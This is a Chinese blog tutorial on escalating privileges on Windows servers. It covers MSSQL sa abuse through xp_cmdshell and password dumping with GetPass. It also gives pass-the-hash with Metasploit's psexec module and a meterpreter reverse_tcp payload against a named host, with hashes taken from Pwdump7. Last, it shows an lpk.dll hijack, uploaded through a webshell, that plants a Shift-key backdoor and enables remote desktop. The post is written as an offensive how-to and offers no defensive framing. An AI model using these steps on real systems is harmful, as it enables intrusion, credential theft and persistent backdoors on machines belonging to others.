提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

╰半橙微兮° 2022-06-18 04:14 735阅读 0赞

**(一)、Mssql提权**

必要条件：获取到mssql数据库最高权限用户sa的账号密码

Mssql默认端口：1433

Mssql最高权限用户：sa

![20170329175503400][]

得到sa密码之后，通过工具直接连接上去。

![20170329175813026][]

MSSQL自带了一个XP\_CMDSHELL用来执行CMD命令。

**(二)、GetPass  提权**

一款获取计算机用户账号密码的工具

![20170329182144328][]

**(三)、hash传递入侵 msf加载**

Hash 算法：windows密码的加密方式

Msf下载：[http://www.rapid7.com/products/metasploit/download.jsp][http_www.rapid7.com_products_metasploit_download.jsp]

以下使用Kali演示

Msf使用：

msfconsole   //启动终端

![20170329184629049][]

use exploit/windows/smb/psexec //用到模块

show options //查看模块选项属性

![20170329185446256][]

set PAYLOAD windows/meterpreter/reverse\_tcp   //设置漏洞利用载体

Show targets //查看模块的攻击目标属性

![20170329190359574][]

set LHOST //设置本机地址  
set RHOST 192.168.0.254 //设置属性目标主机地址  
set SMBUser administrators //设置属性用户

![20170329190708859][]

set SMBPass  xxx  //设置属性密文hash

目标主机的hash怎么获取了?可以通过Pwdump7这个工具来获取hash值

![20170329191216905][]

复制以下一段就行了

![20170329191429484][]

![20170329191849078][]

exploit  //开始攻击  
  
![20170329192041190][]

获取当前shell,执行命令

![20170329192142316][]

**(四)、lpk提权**

触发：目录下存在exe文件被执行，他的特点是每个可执行文件运行之前都要加载该文件，windows系统是先判断当前文件目录是否存在此文件，如果目录下存在该文件则执行,如果不存在则会执行system32目录下的dll。

启动方案：3389远程桌面连接启动（连续shift，然后按热键）

提权方案：生成lpk.dll，通过webshell上传至文件目录，等待管理员去触发exe程序。

运行LPK Setch这个工具选择，2键启动，此时的2键3键值为LPK Sethc内置固定的数字，比如65,66就对应a与b。

![20170329201641457][]

然后点击生成，将生成的lpk.dll上传至任意目录,并运行其中的任何一个exe文件,lpk.dll将会自动替换为shift后门。

我这里把它生成到了软件的目录，然后点击运行软件

![20170329202422657][]

然后远程连接，连续按五次shift键，会出现下面的提示

![20170329202706426][]

接着同时按下组合键(也就是在哪里设置的65,66,对应的A,B)，就会出现下面的密码框

![20170329202832741][]

输入密码，就会进入下面的界面!!!

![20170329202913130][]

还可以用来执行软件，比如用来开3389，在生成lpk.dll是选中

![20170329203605945][]

生成lpk.dll然后放到任意目录下，未执行软件之前远程是关闭的

![20170329203955556][]

然后执行exe软件，你好发现远程被打开了。

![20170329204110901][]

[20170329175503400]: /images/20220618/cae1c7ef89f044479200dc72aec33494.png
[20170329175813026]: /images/20220618/c3a20dd01daa4cb18ed588013f01c977.png
[20170329182144328]: /images/20220618/941457cf0f8f4e36ad8d720b3afb4a85.png
[http_www.rapid7.com_products_metasploit_download.jsp]: http://www.rapid7.com/products/metasploit/download.jsp
[20170329184629049]: /images/20220618/9ac2260f5b184c039b4e19f23176def5.png
[20170329185446256]: /images/20220618/26aaa1fcdfca4ab08c952e29bcb0ecf9.png
[20170329190359574]: /images/20220618/514d8916b3c945b8837fad8cfabf8600.png
[20170329190708859]: /images/20220618/a98b8fffe0084a95b3c2ba7ba1c7929b.png
[20170329191216905]: /images/20220618/bad6fc40c23840a7a750453a1f970279.png
[20170329191429484]: /images/20220618/8b9c95da63404778b6fc6ef6a98482ef.png
[20170329191849078]: /images/20220618/5374940c5c2a443db39b370e706b0490.png
[20170329192041190]: /images/20220618/c613edc7943b41c0b5e92782c1f3e98d.png
[20170329192142316]: /images/20220618/bd21efe10f0b467ca24f184eaf7b9f1f.png
[20170329201641457]: /images/20220618/cc0ff937ffd24a319fdf59947327b596.png
[20170329202422657]: /images/20220618/8696d0cb762742379e96689791f70884.png
[20170329202706426]: /images/20220618/89d0b3061b2442a4b7d4e58ce37d2ee7.png
[20170329202832741]: /images/20220618/a464dd3e62304e1a85a8dc48fa268d28.png
[20170329202913130]: /images/20220618/913c84891bf34805b1def4b864bc5af5.png
[20170329203605945]: /images/20220618/e24a8d6059cf4bf6ae9964eb71455502.png
[20170329203955556]: /images/20220618/f7421132ebb64300bb96c88a5ad11efc.png
[20170329204110901]: /images/20220618/c665eb522843403aa6f9e3bad38ec49d.png